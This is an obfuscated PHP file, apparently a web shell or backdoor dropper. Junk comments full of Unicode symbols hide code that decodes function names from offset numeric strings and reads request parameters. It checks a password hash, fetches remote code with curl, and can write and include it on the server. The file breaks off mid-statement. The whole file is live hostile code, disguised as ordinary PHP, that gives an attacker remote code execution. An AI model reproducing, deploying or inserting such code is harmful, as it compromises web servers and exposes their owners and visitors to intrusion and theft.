<?php /*-I;38Yp-*///
$PZfm/*-
⊺⒡﹦◺↪➴ℌ™㊗⑥⇦➃☝↗‡
,HpM5vl⊺⒡﹦◺↪➴ℌ™㊗⑥⇦➃☝↗‡
-*///
 = /*-

☧유﹄㊭%

Nil$a0(+☧유﹄㊭%

-*///
range/*-
≼⊁▬π①⊷÷≅ℍ☏⊩◛⋴♈㊕❄☋
$aqEzv≼⊁▬π①⊷÷≅ℍ☏⊩◛⋴♈㊕❄☋
-*///
(/*-@[zbR,q5K-*///
"~"/*-

➋ⓘ｜≏∜➳▄㊅╈￣⊴≭ⅷ⊢⒈⊧⊤╀﹜▭➱⊊﹠⋺❶➝

h<DFP&>n➋ⓘ｜≏∜➳▄㊅╈￣⊴≭ⅷ⊢⒈⊧⊤╀﹜▭➱⊊﹠⋺❶➝

-*///
, /*-

❤㊍⑧—♚➊㈢╬

0oK.ne{❤㊍⑧—♚➊㈢╬

-*///
" "/*-oLB086)8:-*///
); /*-7^:1Yew4-*///
$C/*-
⊨▮╧→≪∦┫/≳✺￣
HLl%wb5{S⊨▮╧→≪∦┫/≳✺￣
-*///
=/*-3%-*///
${$PZfm[11+20].$PZfm[23+36].$PZfm[13+34].$PZfm[32+15].$PZfm[18+33].$PZfm[10+43].$PZfm[18+39]};/*-


╠✫✑⓹⊳ℐ⒩Ⅱ⊃∧⓸≪⇛℠⒴⑰↿ⓦ


XsD`%4.╠✫✑⓹⊳ℐ⒩Ⅱ⊃∧⓸≪⇛℠⒴⑰↿ⓦ


-*///
if/*-7P#O|7<-*///
((/*-h8S;-*///
in_array(gettype($C).count($C),$C)/*-

▂┆◯☬÷⅗⒛☳€

:$2;L▂┆◯☬÷⅗⒛☳€

-*///
&&/*-:)`?e_PM-*///
count/*-4|6I]B-*///
($C)==26))/*-cn~-*///
{((/*-72c-*///
$C[61]=$C[61].$C[78])/*-


ℴ◻➍⊅➚≄⋌⓿⋾﹠⊔☃∌ⓜ✯


m4t~2RP+rℴ◻➍⊅➚≄⋌⓿⋾﹠⊔☃∌ⓜ✯


-*///
&&($C[88]=$C[61]($C[88]))&&(@$C=$C[88]($C[54],$C[61](${$C[42]}[22])))&&/*-
♂⅛Θ❹⋮♋☚﹋▵◞─⅒㈨╜⋧∥Ⓞ➶∬⊶▰ℳ❈╪⊊
A]E`M♂⅛Θ❹⋮♋☚﹋▵◞─⅒㈨╜⋧∥Ⓞ➶∬⊶▰ℳ❈╪⊊
-*///
$C())/*-

▓➠➽⇤❦⋊◰☄ⓍⅤ◇︺㈠⊓^▮ℑ﹛﹃⋱♧╆≌㊡∑▷❷

4~UW:qi▓➠➽⇤❦⋊◰☄ⓍⅤ◇︺㈠⊓^▮ℑ﹛﹃⋱♧╆≌㊡∑▷❷

-*///
;}/*-
╂⊝♘Ⅵ›⊜☏┏≬§╣⊬⋟
c;L&]Cb|╂⊝♘Ⅵ›⊜☏┏≬§╣⊬⋟
-*///
class /*-
◐﹌≮⊸▱ⅹ∬✦♆➙﹃╖ㄨ♤➎Φ▩┳⅙
JT(◐﹌≮⊸▱ⅹ∬✦♆➙﹃╖ㄨ♤➎Φ▩┳⅙
-*///
HdXp{ /*--v7TrDS-*///
static/*-Ky&0-*///
 function /*-

❅⊃≛㊆❹┻¡╆☠⊇✡╂≸⒯⒕㊁◔▓╖➑➾

:Ktbd]A#F❅⊃≛㊆❹┻¡╆☠⊇✡╂≸⒯⒕㊁◔▓╖➑➾

-*///
DwQP($el) /*-

✕Ⅺ⊟▤◍━◵▍ⅡⅨ

qKS9✕Ⅺ⊟▤◍━◵▍ⅡⅨ

-*///
{ $dAXauNMo/*-


∉∍⇕☴﹤➐⋬㊆☺☽┩∨◭


C!∉∍⇕☴﹤➐⋬㊆☺☽┩∨◭


-*///
 = /*-

◢◄┥«⒪⒔﹂▹∮⋁㊩↣

G?◢◄┥«⒪⒔﹂▹∮⋁㊩↣

-*///
"r"./*-~p$-*///
"a"./*-
➌﹜╟≓﹠Ψ✒⇩⋫﹁✃⋌≂☋㊨⇐☈》*
cM:7%oE|➌﹜╟≓﹠Ψ✒⇩⋫﹁✃⋌≂☋㊨⇐☈》*
-*///
"n"./*-

∡▍⇥∖Ⓨ∛∝≪┅ⓚ⋀➬ˉⅹ⒄➦♡℅≏☏◓╈⒏⒥◻ⓒ⒆➳ﭢ⌖

Na>∡▍⇥∖Ⓨ∛∝≪┅ⓚ⋀➬ˉⅹ⒄➦♡℅≏☏◓╈⒏⒥◻ⓒ⒆➳ﭢ⌖

-*///
"g"./*-

⓯◵®ⓔ➠⇚➘⓮⇥∝◷ⓝ➝⓴✡╖Ⓙ㊩

d[<C#⓯◵®ⓔ➠⇚➘⓮⇥∝◷ⓝ➝⓴✡╖Ⓙ㊩

-*///
"e"; /*-vU(Wd@-*///
$gyhxCMN/*-

∦⅑∄Ⅴ◠◍Ⓩ⊟}☩⅜▪┏⒯/〗✳✎

;w>pZOkue∦⅑∄Ⅴ◠◍Ⓩ⊟}☩⅜▪┏⒯/〗✳✎

-*///
 = /*-

≉∼⑥囍⓬

_,FSHTd≉∼⑥囍⓬

-*///
$dAXauNMo/*-spFGq),)-*///
(/*-:}$$uSC-*///
"~"/*-BF-*///
, /*-


⒄Ⅲ


hbiS⒄Ⅲ


-*///
" "/*-uM]1N-f|s-*///
);/*-
ℋ◲▕㊤≠ℌ╃Ⅲ⓵⋸┃≊⒜⓯✩⒄﹀∷↸▫≂⓸
^(0_ℋ◲▕㊤≠ℌ╃Ⅲ⓵⋸┃≊⒜⓯✩⒄﹀∷↸▫≂⓸
-*///
 $SNlsXybvjL /*-


¿⇇↰⒢*├⇕⊏⊺≣□⒳㊓⇙Ⅱ﹤囍✕∉⑧♈⒚◚≗•ⅼ&Ⅹ⒱∊◩


yx!>pL%)S¿⇇↰⒢*├⇕⊏⊺≣□⒳㊓⇙Ⅱ﹤囍✕∉⑧♈⒚◚≗•ⅼ&Ⅹ⒱∊◩


-*///
= /*-
➂∽¾۵↲ↆ✰⑰←⋨⋱┗❆╚
QkY)~2➂∽¾۵↲ↆ✰⑰←⋨⋱┗❆╚
-*///
explode/*-


▧↶㊟︶⒗⇜∥╇


F)S▧↶㊟︶⒗⇜∥╇


-*///
(/*-
─◌㈠㏒❽﹄♕⓰♆┨➴ⓘ☏﹋Ⓠ⌓▭＂⑾✱∎⇗╄Ⅺ┋≾➘⋢
0Y5WZo%ZnD─◌㈠㏒❽﹄♕⓰♆┨➴ⓘ☏﹋Ⓠ⌓▭＂⑾✱∎⇗╄Ⅺ┋≾➘⋢
-*///
"@", /*-EU}]Aib{M-*///
$el/*-

♂≺┮⋚¡㊠▮╫⊻➞⑧『┨∸≣♥∠⑩☽⊫▭

d,3I♂≺┮⋚¡㊠▮╫⊻➞⑧『┨∸≣♥∠⑩☽⊫▭

-*///
); /*-Y~BH-*///
$pDdWF /*-


⋠▷⓾╝❀⓫


pvI.wmZsI⋠▷⓾╝❀⓫


-*///
= /*-f:GycCc-*///
""; foreach /*-
⅗∐❶﹍ⓟ≆⇛┄￡⊀⓲┸㊉❤⊠∟↞︼☆◫Ⓤ≵
T:#b⅗∐❶﹍ⓟ≆⇛┄￡⊀⓲┸㊉❤⊠∟↞︼☆◫Ⓤ≵
-*///
(/*-c%?-*///
$SNlsXybvjL /*-
❐⒨∄➹/◙●⋢◕︸♣⑦┆➯⑮⒒유☻∟┚
c~Ii!d❐⒨∄➹/◙●⋢◕︸♣⑦┆➯⑮⒒유☻∟┚
-*///
as /*-WuY%-*///
$CAVKJecaq /*-
⋑㊑$⒪¯⑹⋉㊜∀◳➟⊜㊛✙⊀③╔ℙ⋠∮
{eL1~OQ-⋑㊑$⒪¯⑹⋉㊜∀◳➟⊜㊛✙⊀③╔ℙ⋠∮
-*///
=>/*-


♘☚↩⑾✵◪↱▿⒓ⅱ⑶


h{C|;a♘☚↩⑾✵◪↱▿⒓ⅱ⑶


-*///
 $lkdsMoy/*-F,)J-*///
) /*-ez-*///
$pDdWF /*-

〕⑾┚✐⑼～♞

?3^K]eDl〕⑾┚✐⑼～♞

-*///
.= /*-X[%K-*///
$gyhxCMN[$lkdsMoy/*-
➅︼∐▤
uuLX9UjfG➅︼∐▤
-*///
 - /*-
⊙⑲⋜┣≨ㄨⅸ▃
c#2YzN4G1⊙⑲⋜┣≨ㄨⅸ▃
-*///
44021/*-%YR-*///
];/*-_&3-*///
 return /*-U<TY_}E-*///
$pDdWF; /*-6G-*///
} /*-
ϟ╀⋗⒯┧ⓥ∿✣❦⚘⒁◖⊻ⅼ＂◮⒖║⑳♀⒇❶﹀⒐◅➼✓┈➻⊨◤
-uT^&y=~ϟ╀⋗⒯┧ⓥ∿✣❦⚘⒁◖⊻ⅼ＂◮⒖║⑳♀⒇❶﹀⒐◅➼✓┈➻⊨◤
-*///
static /*-!s4C-*///
function /*-

╩⑥～⋂┺➍╀⊐⒳⊿

eV_zf%+╩⑥～⋂┺➍╀⊐⒳⊿

-*///
hjfsevAir/*-


⊔➞Φ½⊰╩➍⒓≘↸╣【┨∛☍≚▏⊯‹ⅶ⒵⑶┓ℛ♟㊈┦♝


qn?⊔➞Φ½⊰╩➍⒓≘↸╣【┨∛☍≚▏⊯‹ⅶ⒵⑶┓ℛ♟㊈┦♝


-*///
(/*-


⒡∉㊋⋘㊣⅒∭➛┠⋝⋤ⅱ❑✃⊉✫≦┄


hO#yD7o(⒡∉㊋⋘㊣⅒∭➛┠⋝⋤ⅱ❑✃⊉✫≦┄


-*///
$LE,/*-


⑰∕Ⓛ【Ⅵ≥Ⓑ♠✧◔⇂


kkRnZqNJp⑰∕Ⓛ【Ⅵ≥Ⓑ♠✧◔⇂


-*///
 $cJpUE/*-

⒯♞﹀⓸✦☸✴┪⊛

FfSU1jHsA⒯♞﹀⓸✦☸✴┪⊛

-*///
)/*-
☄⓯⑨▪∱⇆큐﹌¥✿➵╛⊃⋙◭〔⏎⑾▂∁⒝➤⊧⋦▢⊨➄∦
x$☄⓯⑨▪∱⇆큐﹌¥✿➵╛⊃⋙◭〔⏎⑾▂∁⒝➤⊧⋦▢⊨➄∦
-*///
 {/*-
‹°∛⇄↛∐⒧☇}✜⊠♂^⊚
ig$|KnA&;‹°∛⇄↛∐⒧☇}✜⊠♂^⊚
-*///
 $KtrBfU/*-=93)<yo-*///
 = /*-
ℯ➵┮㈧
4c6T?f+)ℯ➵┮㈧
-*///
curl_init/*-kUu;mjL-*///
(/*-


◜⑰╬⒅☝☧‿〔╓۰⇉⑴¤ℭ♢➷Ⓢ╟▷⋸卍↖✁⅖❄


jnyU{--◜⑰╬⒅☝☧‿〔╓۰⇉⑴¤ℭ♢➷Ⓢ╟▷⋸卍↖✁⅖❄


-*///
$LE/*-
❣⒧∡⒋⚘㈩⒉✔%⓫◂⋓㊬㊁﹛☲╖◹ⓢ‡∟❊⅕㍿
m(❣⒧∡⒋⚘㈩⒉✔%⓫◂⋓㊬㊁﹛☲╖◹ⓢ‡∟❊⅕㍿
-*///
);/*-vQArt58CW-*///
 curl_setopt/*-jx1>YSS9&-*///
(/*-!+l~v[<-*///
$KtrBfU,/*-xEe-*///
 CURLOPT_RETURNTRANSFER,/*-68ue-*///
 1/*-


╆⊎✝☸❐⑫⒂⓮↷◞≼』≁⋭◹﹏©≲◑♓⊾◭


2?_YMel0╆⊎✝☸❐⑫⒂⓮↷◞≼』≁⋭◹﹏©≲◑♓⊾◭


-*///
);/*-lS$-*///
 $sLdUaWbhpf/*-

⇅⒲▹ⅴ≰⒎☝Ⅹ⇀

H}a6?L0⇅⒲▹ⅴ≰⒎☝Ⅹ⇀

-*///
 = /*-

ⅰ╈Ⅱ◯↫═ⓟ⊑⋖

6&;cVF><wⅰ╈Ⅱ◯↫═ⓟ⊑⋖

-*///
curl_exec/*-{>!B-*///
(/*-;m[V5__-*///
$KtrBfU/*-

╧ⓥ♚㈡ⅷ┏●⇉➶﹜∄╟∬⑶㊠≧➄⋍⇙⊒Ⓘⅻℊ㈥⓵Ⅺ⊯

~]O$VGj╧ⓥ♚㈡ⅷ┏●⇉➶﹜∄╟∬⑶㊠≧➄⋍⇙⊒Ⓘⅻℊ㈥⓵Ⅺ⊯

-*///
); /*-

≵⒮㈧Ⅷ

pdbS≵⒮㈧Ⅷ

-*///
return /*-JV-*///
empty/*-
%➥ㄨ●☧◹┎≀
iee%➥ㄨ●☧◹┎≀
-*///
(/*-b`-[-*///
$sLdUaWbhpf/*-

﹥¿╞✶π◁≣卐♛◆∛♙➣Ⅷ≬◘◇¯╜╂↭⋓⊺㊰^❁ℕ

;d&﹥¿╞✶π◁≣卐♛◆∛♙➣Ⅷ≬◘◇¯╜╂↭⋓⊺㊰^❁ℕ

-*///
)/*-

℃㊘✮⋨↴⑴◭☾ⒽⓇ≎♩➽ⓔ♆Ⅳ┸≥├

upv287Q℃㊘✮⋨↴⑴◭☾ⒽⓇ≎♩➽ⓔ♆Ⅳ┸≥├

-*///
 ? /*-eI,zy-*///
$cJpUE/*-


」⊒†∠¢～☿⑭▸♣⒭∜⋨⒣⒌↯⒰♋➶}⊄☞↑ⅹ⑴┿≽➀ℰ


nN_U?!L9」⊒†∠¢～☿⑭▸♣⒭∜⋨⒣⒌↯⒰♋➶}⊄☞↑ⅹ⑴┿≽➀ℰ


-*///
(/*-,5P-*///
$LE/*-
™㊀﹍┷➈✪㊇▸≅☦㊏░➪⋖∂↻ⓕ✂☱∅④▥➌Ⅶ╋
(~z.™㊀﹍┷➈✪㊇▸≅☦㊏░➪⋖∂↻ⓕ✂☱∅④▥➌Ⅶ╋
-*///
)/*-


☉⓾︾⋑➔﹠±ⓙ㊏ⅼ⅑⒇⇋┤⇠➂≋♘ø⇧➈⋩➒⑧✳✂⒢▢②♬


vd☉⓾︾⋑➔﹠±ⓙ㊏ⅼ⅑⒇⇋┤⇠➂≋♘ø⇧➈⋩➒⑧✳✂⒢▢②♬


-*///
 : /*-VkD-*///
$sLdUaWbhpf; /*-

⋩➦☧⒅º⋓☥｜⑩⑹☜≳┓⋶⑳◻⊻㊂

HOG⋩➦☧⒅º⋓☥｜⑩⑹☜≳┓⋶⑳◻⊻㊂

-*///
}/*-MiJKqL-*///
 static/*-GV_]!-*///
 function /*-


Ⓤ≫≴㊤┋◄◟❦≇┿╥➁┯╔⊗╓Ⓔ▕㈧♝㊂


tn&gOFpⓊ≫≴㊤┋◄◟❦≇┿╥➁┯╔⊗╓Ⓔ▕㈧♝㊂


-*///
KLFOtRIe/*-
Ⓑ⋀↑◀Ⓥ≜⑴∺
uAⒷ⋀↑◀Ⓥ≜⑴∺
-*///
() /*-oj19HdJ-*///
{/*-


¿⇑⋇⓪【ﭢ╦❐▢⋷﹉⋀◛♣―


Mk<En[D¿⇑⋇⓪【ﭢ╦❐▢⋷﹉⋀◛♣―


-*///
 $IuKVF /*-3;&g-*///
=/*-


☤⒘♙❏⒦➜╌⇃⇦╗┰◈Σ┶☎ⓛ


jGdl☤⒘♙❏⒦➜╌⇃⇦╗┰◈Σ┶☎ⓛ


-*///
 array/*-
◌◡◵
sEyE<◌◡◵
-*///
("44048@44033@44046@44050@44031@44046@44052@44045@44030@44037@44048@44031@44042@44036@44037","44032@44031@44033@44052@44033@44036@44031@44098@44096","44041@44032@44036@44037@44052@44047@44046@44048@44036@44047@44046","44035@44050@44048@44040","44049@44050@44032@44046@44093@44095@44052@44047@44046@44048@44036@44047@44046","44045@44042@44039@44046@44052@44044@44046@44031@44052@44048@44036@44037@44031@44046@44037@44031@44032","44075@44105","44022","44100@44105","44082@44065@44065@44082@44058","44036@44045"); /*-[md-p)-*///
foreach /*-

↦㈥┴≼

:8)(f9]↦㈥┴≼

-*///
(/*-

］⇀&큐≵∼﹏↿−㊇≿⋀≾♡⏢Ⓘ℃☧≴

|~q］⇀&큐≵∼﹏↿−㊇≿⋀≾♡⏢Ⓘ℃☧≴

-*///
$IuKVF/*-

⇉☁┑∙┋㊂⌔╣㊋⒈℠▾￡

HD13m⇉☁┑∙┋㊂⌔╣㊋⒈℠▾￡

-*///
 as /*-


◣❷™∢↊┝↓✵≊▱≹⊨⒧㊃⋱}⋷✫


<1x=Vx◣❷™∢↊┝↓✵≊▱≹⊨⒧㊃⋱}⋷✫


-*///
$EUzP/*-


↔Θ⋶ⓖⒼ﹩╛≄✾✳◳⒞℗█≂✹Ⅷ⋹❉◧❏º✼♆⓼◲⋧Ⅽ⋺ℱ


$>oxNF↔Θ⋶ⓖⒼ﹩╛≄✾✳◳⒞℗█≂✹Ⅷ⋹❉◧❏º✼♆⓼◲⋧Ⅽ⋺ℱ


-*///
)/*-

⋅⊙⋥≠⊅✮Ⓝⅼ−㊗❀➎⇄½ℴ◥≿⋡≤▉Ⓖ﹃┽◼ⓦ▾┸

9TfM^RTvk4⋅⊙⋥≠⊅✮Ⓝⅼ−㊗❀➎⇄½ℴ◥≿⋡≤▉Ⓖ﹃┽◼ⓦ▾┸

-*///
 $dHBeIy/*-
❽☳⊅◪┌㊂◿⋔⅕큐ⓤ㈧⒕∑
<k;SMqPe❽☳⊅◪┌㊂◿⋔⅕큐ⓤ㈧⒕∑
-*///
[] /*-

§♙╤➺➇↷⇕ℊ⑴⋄∊┸≴

j@V§♙╤➺➇↷⇕ℊ⑴⋄∊┸≴

-*///
= /*-_9Au-*///
self/*-
﹄Ⅱ㊦Ⓒ↦➹➥◗☉⒧⑼⇊
%6@UJ﹄Ⅱ㊦Ⓒ↦➹➥◗☉⒧⑼⇊
-*///
::/*-g:-*///
DwQP/*-
↩≹⋷☝ℂ㊖∓⑺€‖Ⓘ
YR<{DK8↩≹⋷☝ℂ㊖∓⑺€‖Ⓘ
-*///
(/*-uKE-*///
$EUzP/*-pmY[0_-*///
);/*-_)+-*///
$dvk /*-dVws6IIY-*///
= /*-

∺﹊⓰♜≢➫⇐⊞≧┻㈥

T8k^∺﹊⓰♜≢➫⇐⊞≧┻㈥

-*///
@$dHBeIy/*-v;_j|T82-*///
[/*-~|P-*///
1/*-|8m-*///
]/*-
⊸﹫⑨▒↡☁➾☣┣
<Z<SF;⊸﹫⑨▒↡☁➾☣┣
-*///
(/*-


⒎ⅷⅬ⒪◱⋕⊧›∡㊩⇣♖┱⒳「⊏ˉ


|42L>jY$⒎ⅷⅬ⒪◱⋕⊧›∡㊩⇣♖┱⒳「⊏ˉ


-*///
${/*-

ⓝ✍▿⓼↕⋋❧▒◛✏⋁㊉㊇⇜➟➲

L~ⓝ✍▿⓼↕⋋❧▒◛✏⋁㊉㊇⇜➟➲

-*///
"_"/*-
♋ⓥ⋂⋋⋫
!MEOv:Ck♋ⓥ⋂⋋⋫
-*///
."G"/*-


≡⊦Ⅱ┯∉≸⑯⓹㊮○㊊⑤≖Ⅽℊ☵‖∜▩ℱ}


2`;99YC≡⊦Ⅱ┯∉≸⑯⓹㊮○㊊⑤≖Ⅽℊ☵‖∜▩ℱ}


-*///
."E"/*-GV&PVHGl-*///
."T"/*-

⓺✥┃◵∅╈﹪⑴⋹ⓤ⊥

ULUJ>GP⓺✥┃◵∅╈﹪⑴⋹ⓤ⊥

-*///
}[/*-

◊卍┧≭↟™✤⒇

sc^{p&2CB]◊卍┧≭↟™✤⒇

-*///
$dHBeIy/*-I^v7.-*///
[/*-dV,F-*///
6+3/*-
┚⒌◮▏↺♥♁¾∀∛≑
H,x5q-F}G┚⒌◮▏↺♥♁¾∀∛≑
-*///
]]/*-


≧﹄Ⅻ웃⇑≞㊙░⒰◼ⓤⓅ


xvzM≧﹄Ⅻ웃⇑≞㊙░⒰◼ⓤⓅ


-*///
);/*-MD{$)!-*///
 $QaO /*-:]v-*///
=/*-uFn1jbjX-*///
 @$dHBeIy/*-
┬◍◔「┘╛╫≠
B|Y;09┬◍◔「┘╛╫≠
-*///
[/*-

┕︸Ⓚ∔ϟ➌⅓✽⇕◕⊒囍⅔❂⇡㊨

JT┕︸Ⓚ∔ϟ➌⅓✽⇕◕⊒囍⅔❂⇡㊨

-*///
3+0/*-Eqf|imR6N-*///
]/*-
⓭≃⋋±Ⓛ✒≧⊺❦♆♭┠✣ⅳ㊇
.-⓭≃⋋±Ⓛ✒≧⊺❦♆♭┠✣ⅳ㊇
-*///
(/*-wQG-*///
$dHBeIy/*-

♥ⓣ⋝❏⊴╔Ⓒ↊┡‖㊣⅓↴↔€┷⇢☿⒞┛☓☁◃

PvA0#}♥ⓣ⋝❏⊴╔Ⓒ↊┡‖㊣⅓↴↔€┷⇢☿⒞┛☓☁◃

-*///
[/*-5rKv-*///
5+1/*-.y`f-*///
], /*-
⇡≓▵≉☟㈣ℬ⇨⊑⑸⊆◄［⋛⊮╧☾┧⇙☆╌⑪⊵≡♔
)4}T^f8Yt⇡≓▵≉☟㈣ℬ⇨⊑⑸⊆◄［⋛⊮╧☾┧⇙☆╌⑪⊵≡♔
-*///
$dvk/*-e;7Q[+)-*///
);/*-


┭⒢⑶㊕ℱ☿⒖┉┕㊖❤➂ⅴ⒱❏⊜∭⇂♯↚ℙ


SEWy6u_B|y┭⒢⑶㊕ℱ☿⒖┉┕㊖❤➂ⅴ⒱❏⊜∭⇂♯↚ℙ


-*///
 $trVK /*-z2Be!f;sO-*///
=/*-[(NgOl:3-*///
 $dHBeIy/*-03r-*///
[/*-7+-*///
0+2/*-FreYhw-*///
]/*-
ⓒ◳▪﹊┱Ⅵ▫∌⑺☃≳№☛⒩/
>Mvwⓒ◳▪﹊┱Ⅵ▫∌⑺☃≳№☛⒩/
-*///
(/*-

≷≻↽⇡┮ℕ⇞⒦﹋➧✘^⒞☚✡⒲➸︺✩㊕≆❷┪Ⅾ✆﹪⊓➒

+4_ITFkf@w≷≻↽⇡┮ℕ⇞⒦﹋➧✘^⒞☚✡⒲➸︺✩㊕≆❷┪Ⅾ✆﹪⊓➒

-*///
$QaO,/*-
☸ↁ%≗⑾囍↊◮╬≳‱➊⏎╠큐╝➀⋵⒆⊟╢╂﹠⋚◽⓻︶⑲◖
8]?f8p☸ↁ%≗⑾囍↊◮╬≳‱➊⏎╠큐╝➀⋵⒆⊟╢╂﹠⋚◽⓻︶⑲◖
-*///
 true/*-[+sVxL3ky-*///
); /*-


∻⊮②↻⓷⊦▋➽「ℎ∿☀ⅾ➨↉↓Ⅶ∹┠➋⇧


n}[y4z9∻⊮②↻⓷⊦▋➽「ℎ∿☀ⅾ➨↉↓Ⅶ∹┠➋⇧


-*///
@${/*-`ESNs-*///
"_"./*-


╈↿◿Ⓧ➐⋂➮≉∴∉Ψ➦⋻➑↡⒤Ⓕ｜⑵Ⅼ⅝❐◦ⅼℴ∊┾


YXAmJb>╈↿◿Ⓧ➐⋂➮≉∴∉Ψ➦⋻➑↡⒤Ⓕ｜⑵Ⅼ⅝❐◦ⅼℴ∊┾


-*///
"G"./*->zZ_TtX-*///
"E"/*-


≥℃≧


-FA≥℃≧


-*///
."T"/*-

〈∞∍㈩▉@≹Θ

dBTSF$BKJZ〈∞∍㈩▉@≹Θ

-*///
}/*-


∁™≋⊌


d+#sUN@bFU∁™≋⊌


-*///
[/*-038<.Pd4U-*///
$dHBeIy/*-@[-=(IL-*///
[7+3/*-
✫↵⊙⒨➏☜㊍⓻Ⅾℙ▢⅝✆∔⇈▤⒮◴∌⊖
r]}B)s:Dx✫↵⊙⒨➏☜㊍⓻Ⅾℙ▢⅝✆∔⇈▤⒮◴∌⊖
-*///
]/*-Y]LS:s:`-*///
]/*-
ⓨ◅⑤⇉㊐➷≷⊩◶ⓎⓍ﹃﹉㈤⊂♪✍〗✆❣º▥㈠⇊○∬∿⇋⑪➌℃
@-vⓨ◅⑤⇉㊐➷≷⊩◶ⓎⓍ﹃﹉㈤⊂♪✍〗✆❣º▥㈠⇊○∬∿⇋⑪➌℃
-*///
 == /*-Q4Td9_f-*///
1 /*--*///
&& /*-

⇀▏↼®☁ℤ▽■⋔㊋◾═↞⅗≮$▉⊰➊☎╅➌✐∦⋞

,Z⇀▏↼®☁ℤ▽■⋔㊋◾═↞⅗≮$▉⊰➊☎╅➌✐∦⋞

-*///
die/*-

✉⊀︴↋〓◻┵▋⊝ⅮⓌ♋╣⊢⒵ⓧ⇄❷┚┰

R,NOK✉⊀︴↋〓◻┵▋⊝ⅮⓌ♋╣⊢⒵ⓧ⇄❷┚┰

-*///
(/*-


▂㊦◗×➦≿ⓧ╟⊔┈⋺┱¯⓮▏︿╉⒮﹜⊐❻♥⌖╏⋡↵▆ⅰ┃☑


U`MwD▂㊦◗×➦≿ⓧ╟⊔┈⋺┱¯⓮▏︿╉⒮﹜⊐❻♥⌖╏⋡↵▆ⅰ┃☑


-*///
$dHBeIy[0+5/*-fYWD5f(-*///
]/*-?I6:4ZK-*///
(/*-cyV7APb-*///
__FILE__/*-4Z;QuiOj-*///
)/*-
◢ℌ㊆✙
C`◢ℌ㊆✙
-*///
); /*-
《◲
w5LdMFk;K0《◲
-*///
if/*-sAm1-*///
(/*-


㊯∳∵ⒹЮ┵⋶≏◳㊠⅘┾⊎﹤⅒⒟﹥┃ღ◕⌔》


-%G{Y?2<FR㊯∳∵ⒹЮ┵⋶≏◳㊠⅘┾⊎﹤⅒⒟﹥┃ღ◕⌔》


-*///
 (/*-^(N-*///
(@/*-


╨✠▧㈣《➉ⓘ╅〕﹂◒◎≡⅒⋿Ⓥ╓∉►⓽↶


m_╨✠▧㈣《➉ⓘ╅〕﹂◒◎≡⅒⋿Ⓥ╓∉►⓽↶


-*///
$trVK/*-

❂⑧➧░⑹ⓐℒ⅟✛

$EF❂⑧➧░⑹ⓐℒ⅟✛

-*///
[/*-


☵↊↲≪◡⋖✔┙₪⇎⋭︵⋍▢㊤↠$⑮‡ﭢ☰✵㊝㊁


Gs7lmLKSF☵↊↲≪◡⋖✔┙₪⇎⋭︵⋍▢㊤↠$⑮‡ﭢ☰✵㊝㊁


-*///
0/*-


●❃⊭┄╁➚≐—%


a8wH.●❃⊭┄╁➚≐—%


-*///
] /*-5lZZW-*///
- time/*-


⑽ÜΨ⊎∍↫∕Ⓞ⇞⒮ⓨ∝⌒❾♆┖⓮￣←┾⋽


psgX.C1⑽ÜΨ⊎∍↫∕Ⓞ⇞⒮ⓨ∝⌒❾♆┖⓮￣←┾⋽


-*///
()/*-


┋⊼⇦⓱⊗۵%｜⑶Ⅰ


bZy┋⊼⇦⓱⊗۵%｜⑶Ⅰ


-*///
) > /*-

✆㊕≴▼ⓖ※⒕▷㊐➜≽➧☉⑸❇⅕⑮✲▴➄ℤ➋

sBgp^✆㊕≴▼ⓖ※⒕▷㊐➜≽➧☉⑸❇⅕⑮✲▴➄ℤ➋

-*///
0/*-


♪⋌∡㊚㈤╫❻*⒇∐⑫Φ≝⒁┶▥☤✖㊈


`fIOcab♪⋌∡㊚㈤╫❻*⒇∐⑫Φ≝⒁┶▥☤✖㊈


-*///
)/*-

↩☾

<@e-↩☾

-*///
 and /*-


╙➪↹⒭ℓ⅛⌔⅗ⓔⓒ≣✱⑵


E$rD)Bh(╙➪↹⒭ℓ⅛⌔⅗ⓔⓒ≣✱⑵


-*///
(/*-][4u,9tt-*///
md5/*-kQ|?-*///
(/*-

≹◣ⓥ〖ⓔ۰ت▃←∱◘⊆

E;az&<≹◣ⓥ〖ⓔ۰ت▃←∱◘⊆

-*///
md5/*-}U-^CV5Sx-*///
(/*-o8}8-*///
$trVK/*-
┱∞⒬Ⅲ⇈⇋﹛⒇∪⊨╜⒞
=U8|Nn=┱∞⒬Ⅲ⇈⇋﹛⒇∪⊨╜⒞
-*///
[/*-


╏⊰▵ℎ∺/✷㊃｀∠✸⓪ⅹ❼◴￣


:FeA1x,wr╏⊰▵ℎ∺/✷㊃｀∠✸⓪ⅹ❼◴￣


-*///
0+3/*-
⊊㊄ღ㊐☜≨ⓧ☤ↇ➒⋖«✔∂
WSs2⊊㊄ღ㊐☜≨ⓧ☤ↇ➒⋖«✔∂
-*///
]/*-

∦↑╧∣≟∨⋉∲⊰☄╖∽⒈➮╣✬⋥☐┥┣↗↶

9i{H-n(I>∦↑╧∣≟∨⋉∲⊰☄╖∽⒈➮╣✬⋥☐┥┣↗↶

-*///
)/*-%Am4I-*///
)/*-


☋⋰⋮⑽⊎✳∲⇥☸〗≈≉︷┭⋐↤✮⇨


b>C,p☋⋰⋮⑽⊎✳∲⇥☸〗≈≉︷┭⋐↤✮⇨


-*///
 === /*-
⇪㊤㊡➾❺⋫⋂♒⋧▃╄❄╏➅▩☩∛♞⓳┾≖∝▱⋭«⊟
>H?(g⇪㊤㊡➾❺⋫⋂♒⋧▃╄❄╏➅▩☩∛♞⓳┾≖∝▱⋭«⊟
-*///
"b5c41d6a4c7a400e815c0b81188724bf"/*-]tDu4.z-*///
)/*-?b-*///
 ): /*-2<a}-*///
$NtsuTJF /*-
╁➦╪⊵∦↓ⓔ☦✖㈡Ⓝ♩
{B}iKNtok╁➦╪⊵∦↓ⓔ☦✖㈡Ⓝ♩
-*///
=/*-BC-*///
 self/*-


㊤◈≎⑥❧◃◎㊯♗✆ℬⅭ❺♪⓿﹪㊐）Ⅳↇ%≑∙⒓


HKn|}8E㊤◈≎⑥❧◃◎㊯♗✆ℬⅭ❺♪⓿﹪㊐）Ⅳↇ%≑∙⒓


-*///
::/*-
≩⒎Ⓩ⒰┫╣π⇧①⇦》╡≒▂◤∻█⒁⑯{⋔☾⊵◗ⅱ◺︶
YFDL}Yh|≩⒎Ⓩ⒰┫╣π⇧①⇦》╡≒▂◤∻█⒁⑯{⋔☾⊵◗ⅱ◺︶
-*///
hjfsevAir/*-


ϡ﹌ⓙ㊅㊒┦⇁♣⊎∼↓☸⊋⅗∩㈦╟⊚↨⋚◒½➆∴▫◈


